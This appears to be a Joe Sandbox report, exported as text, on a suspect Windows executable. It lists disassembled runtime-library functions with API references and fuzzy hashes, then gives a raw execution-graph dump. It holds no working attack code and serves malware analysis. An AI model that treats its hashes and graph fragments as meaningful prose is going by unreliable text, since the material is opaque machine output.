                                                        • Instruction ID: f2de4e478da38eed9a7b3b9105d36654f685f7abf804afd562f50c47f867c1b8
                                                        • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                        • Instruction Fuzzy Hash: 16C119B0E04349EFDF11DFA8D845BAD7BB0AF09340F048199E959A7392D7389E41DB61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID:
                                                        • API String ID: 176396367-0
                                                        • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                        • Instruction ID: c6128086e7bce3abfc69b37961eefd8efb1a92a81bb1a608ecbabfba496da3dc
                                                        • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                        • Instruction Fuzzy Hash: B471ED72900218AFDB22DF64DD85FAEBBBCEF09711F0041A5B509E6155DA74AF81CF10
                                                        APIs
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007697B6
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007697CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Value___vcrt_
                                                        • String ID:
                                                        • API String ID: 1426506684-0
                                                        • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction ID: c8a53a2d088ef73795a8bc756e69a72bcaf7e7896471fafd06d237fbde2459d1
                                                        • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction Fuzzy Hash: 91017032108712BEA7252BF47C8D95A274CEB07736730033AFE12A32E1EF294C01D949
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00769AA3
                                                          • Part of subcall function 007699F0: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00769A1F
                                                          • Part of subcall function 007699F0: ___AdjustPointer.LIBCMT ref: 00769A3A
                                                        • _UnwindNestedFrames.LIBCMT ref: 00769AB8
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00769AC9
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00769AF1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction ID: c53890394bc41ef9e6cc344c84461693783a5186978aa062d91ff9dd44933d75
                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction Fuzzy Hash: 49012932100108BBCF129E95CC45EEB7B7EEF98754F044118FE0966121D73AE861DBA1
                                                        APIs
                                                        • Concurrency::location::_Assign.LIBCMT ref: 0076330A
                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00763328
                                                          • Part of subcall function 00758DE0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00758E01
                                                          • Part of subcall function 00758DE0: Hash.LIBCMT ref: 00758E41
                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00763331
                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00763351
                                                          • Part of subcall function 0075FE38: Hash.LIBCMT ref: 0075FE4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                        • String ID:
                                                        • API String ID: 2250070497-0
                                                        • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                        • Instruction ID: f88c9f35d3eea1f1ca95881bcae94475074b37197c664467a9bf2eb8b6903887
                                                        • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                        • Instruction Fuzzy Hash: B7117077400604EFC715DF65C8869CAF7B8BF19320B044A1EE95687192DBB4F904CBA0
                                                        APIs
                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00766B08
                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00766B1C
                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00766B34
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00766B4C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                        • String ID:
                                                        • API String ID: 78362717-0
                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction ID: 888f0c52df6649b87549f8201632ee6648e38c5904670cdbc318b25db6e1e084
                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction Fuzzy Hash: 46012672700114E7CF16AE58C855EEFB79EDF44310F500015FC1BEB281DA74ED0496A0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction ID: 2e0e4ad26dcc27635e9bd2b21097cec5a41daebd3dcb00b3aba0b1c0a1580887
                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction Fuzzy Hash: 4D11993280504DBBCF125E94CC45CEE3F22BB18754B558466FE1865171C33AD971AB86
                                                        APIs
                                                        • Concurrency::location::_Assign.LIBCMT ref: 0076330A
                                                        • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00763328
                                                          • Part of subcall function 00758DE0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00758E01
                                                          • Part of subcall function 00758DE0: Hash.LIBCMT ref: 00758E41
                                                        • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00763331
                                                        • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00763351
                                                          • Part of subcall function 0075FE38: Hash.LIBCMT ref: 0075FE4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                        • String ID:
                                                        • API String ID: 2250070497-0
                                                        • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                        • Instruction ID: 4a5fd3d27fd725140b2f7fad6647b81a45050c3bb73a7380aa1bad8d2d29ad8a
                                                        • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                        • Instruction Fuzzy Hash: 11012D76500604EBC714DFA5C886DDAF7F8BF59320F008A1EE95687151DBB4F944CB60
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 007462EB
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00746336
                                                        • __Getcoll.LIBCPMT ref: 00746345
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00746355
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                        • Instruction ID: 675265807099055958471b67058c2418a52ad9e805a7537cd2dd79c45c754589
                                                        • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                        • Instruction Fuzzy Hash: 5F015E71911308EFEB14EFA4C449BDDB7B0BF45311F118429E445AB242DBBCA984CF91
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 0074582F
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0074587A
                                                        • __Getcoll.LIBCPMT ref: 00745889
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745899
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                        • Instruction ID: cc1223093be63ba3643c0bbff72f7d358394261a578b2f8084347d95b8738a97
                                                        • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                        • Instruction Fuzzy Hash: 6E015E72D11608EFEB55EFA4C489BDDB7B4BF44311F108429E445AB242DBBCA984CF91
                                                        APIs
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8C9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8D9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8E9
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0075C8FD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Compare_exchange_acquire_4std::_
                                                        • String ID:
                                                        • API String ID: 3973403980-0
                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction ID: 962d6758ff0b0e4446109da4b0b9c989521855cf8d7f379d8ce765fffa38358e
                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction Fuzzy Hash: E60169B600034DEFCF139E54DC43AED3B66AB05352B048411FD1894131C3BAEA79EB45
                                                        APIs
                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00751A9B
                                                          • Part of subcall function 0075130D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0075132F
                                                          • Part of subcall function 0075130D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00751350
                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00751AAE
                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00751ABA
                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00751AC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                        • String ID:
                                                        • API String ID: 4284812201-0
                                                        • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                        • Instruction ID: a3db9246558e1ce2736ca54ad5fbac8d8c6dd0ca5c4be583355c03b3f9906287
                                                        • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                        • Instruction Fuzzy Hash: 1BF02431641204EBCF04BA74086A7FE22854F80353F888168BD126B381DFFC8D0997D0
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0075D7E1
                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0075D805
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0075D818
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0075D826
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID:
                                                        • API String ID: 3657713681-0
                                                        • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction ID: 07c2105e3f6bcb9bce8e11690b4226e5cf715299b5d579bfec6547b5b36252f7
                                                        • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction Fuzzy Hash: 54F05935900608E3C334FA54DC568DEB3799E84712370891EEC0253182DBFCBE0EC691
                                                        APIs
                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0075D68F
                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0075D6C0
                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0075D6DC
                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0075D6E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreDecrementResourceSubscription$CountCurrentDestroyExecutionFixedLevelManager::
                                                        • String ID:
                                                        • API String ID: 3725331629-0
                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction ID: 32a9ed6032c4d765b2963b3495f04e09e798ca6340a6a633e7ccf97f9ea75644
                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction Fuzzy Hash: ABF08236200900DB8639FF10E9148F673B6EFC4752310051CE94B06555CE69AA4ADB21
                                                        APIs
                                                        • std::_Cnd_initX.LIBCPMT ref: 007461E1
                                                        • __Cnd_signal.LIBCPMT ref: 007461ED
                                                        • std::_Cnd_initX.LIBCPMT ref: 00746202
                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00746209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                        • String ID:
                                                        • API String ID: 2059591211-0
                                                        • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction ID: 362f8c605a7aafb6853715ce47dd8b46f99f4b7f4cda487b2a3f009fde50034f
                                                        • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction Fuzzy Hash: B5F0A031000701DBEB3177A0C81F79A73A0AF00326F14885CF456558A2CFBEA8588A95
                                                        APIs
                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 0075285C
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00751AF3
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00751B2A
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00751B36
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00752868
                                                          • Part of subcall function 00751443: Concurrency::critical_section::unlock.LIBCMT ref: 00751467
                                                        • Concurrency::Context::Block.LIBCONCRT ref: 0075286D
                                                          • Part of subcall function 00753621: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00753623
                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 0075288D
                                                          • Part of subcall function 007519FB: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00751A09
                                                          • Part of subcall function 007519FB: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00751A16
                                                          • Part of subcall function 007519FB: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00751A21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                        • String ID:
                                                        • API String ID: 3659872527-0
                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction ID: d818c1397a0110aa818495b34f7a93f1b0826966fad4bf4c5bbec7f1a0f3c48f
                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction Fuzzy Hash: A1E0D834500401EBCB04FF20C46A5DCBB61BF44313F544249E862032A1CFB86E4ACB81
                                                        APIs
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 007690C3
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0076917C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 3480331319-1018135373
                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction ID: 0a2cfc1626ff710f311e5d9f98133197188ddcef0c17be7c920e6f3a8de444e5
                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction Fuzzy Hash: 52411A74A0020EEBCF14DF28C889A9E7BB9AF45324F248155EE166B392D739DD05CF91
                                                        APIs
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00752C9D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00752CAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                        • String ID: ED
                                                        • API String ID: 2172578484-412002901
                                                        • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                        • Instruction ID: 906774b7c40afbe54b6d814fdb09ed6e1705638555eb135ba111104b057d3370
                                                        • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                        • Instruction Fuzzy Hash: 27117375900314ABE7107B756C8EAAB3BAC9906B533240526BC01D3153EEBDD909466C
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: T.exe
                                                        • API String ID: 269201875-3749587449
                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction ID: 0e480b1233a54fccd68c33bbe8f0f7d6899eb4ea5bc9dd6aece70731fb1a8518
                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction Fuzzy Hash: 3DF0F935144A00BBCE1533346C0EA1B2619AFC1BF2F258138F92C92193FE6D8D074666
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                        • API String ID: 269201875-3541670631
                                                        • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                        • Instruction ID: 9ba264e88c5c002a8bcf8b8cea48326000f2bcb2d4f4a126db8b356c42976843
                                                        • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                        • Instruction Fuzzy Hash: 8CE0E512A05950C1DE3122392C09A5A05009B827B5F11C26AEA2CEA0C3DEAC8C0712DA
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0074E230
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074E23E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: h|aE
                                                        • API String ID: 1687795959-4167925309
                                                        • Opcode ID: 1af871c79733728879b608123eee771ee8330ea46e828bb1aa2e16d402f1ad07
                                                        • Instruction ID: c6c98b35f47463dcb999ac2c3cf721080d857fc82d534b4c51f2d0f9e5711aa0
                                                        • Opcode Fuzzy Hash: 1af871c79733728879b608123eee771ee8330ea46e828bb1aa2e16d402f1ad07
                                                        • Instruction Fuzzy Hash: 00C0122480020CBBCB04BAA0DC0A98D7739AA04200F904620AA2092092ABF8A2098BC2

                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:4.2%
                                                        Total number of Nodes:710
                                                        Total number of Limit Nodes:20
                                                        execution_graph: text export of the interactive execution graph (node ids with function addresses, edges as "A->B", and the API names or library calls annotated on each node). The rendered graph does not survive extraction; only this node/edge listing remains.
32924 434152 __wsopen_s 32925->32918 32927 4341b4 32926->32927 32928 4341ce 32926->32928 32959 42eae9 20 API calls __dosmaperr 32927->32959 32949 432928 32928->32949 32931 4341b9 32960 42a5bd 26 API calls _Deallocate 32931->32960 32932 4341d7 32956 4347f3 32932->32956 32935 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 32935->32922 32937 4342db 32939 4342e8 32937->32939 32943 43428e 32937->32943 32938 43425f 32941 43427c 32938->32941 32938->32943 32962 42eae9 20 API calls __dosmaperr 32939->32962 32961 4344bf 31 API calls 4 library calls 32941->32961 32943->32935 32963 43433b 30 API calls 2 library calls 32943->32963 32944 434286 32944->32935 32946->32919 32947->32924 32948->32924 32950 432934 32949->32950 32951 432949 32949->32951 32964 42eae9 20 API calls __dosmaperr 32950->32964 32951->32932 32953 432939 32965 42a5bd 26 API calls _Deallocate 32953->32965 32955 432944 32955->32932 32966 434670 32956->32966 32958 4341f3 32958->32935 32958->32937 32958->32938 32959->32931 32960->32935 32961->32944 32962->32935 32963->32935 32964->32953 32965->32955 32967 43467c __FrameHandler3::FrameUnwindToState 32966->32967 32968 434684 32967->32968 32973 43469c 32967->32973 33001 42ead6 20 API calls __dosmaperr 32968->33001 32970 434750 33006 42ead6 20 API calls __dosmaperr 32970->33006 32971 434689 33002 42eae9 20 API calls __dosmaperr 32971->33002 32973->32970 32976 4346d4 32973->32976 32975 434755 33007 42eae9 20 API calls __dosmaperr 32975->33007 32991 4396c4 EnterCriticalSection 32976->32991 32979 43475d 33008 42a5bd 26 API calls _Deallocate 32979->33008 32980 4346da 32982 434713 32980->32982 32983 4346fe 32980->32983 32992 434775 32982->32992 33003 42eae9 20 API calls __dosmaperr 32983->33003 32984 434691 __wsopen_s 32984->32958 32987 43470e 33005 434748 LeaveCriticalSection __wsopen_s 32987->33005 32988 434703 33004 42ead6 20 API calls __dosmaperr 32988->33004 32991->32980 33009 439941 32992->33009 32994 434787 32995 4347a0 SetFilePointerEx 32994->32995 32996 43478f 
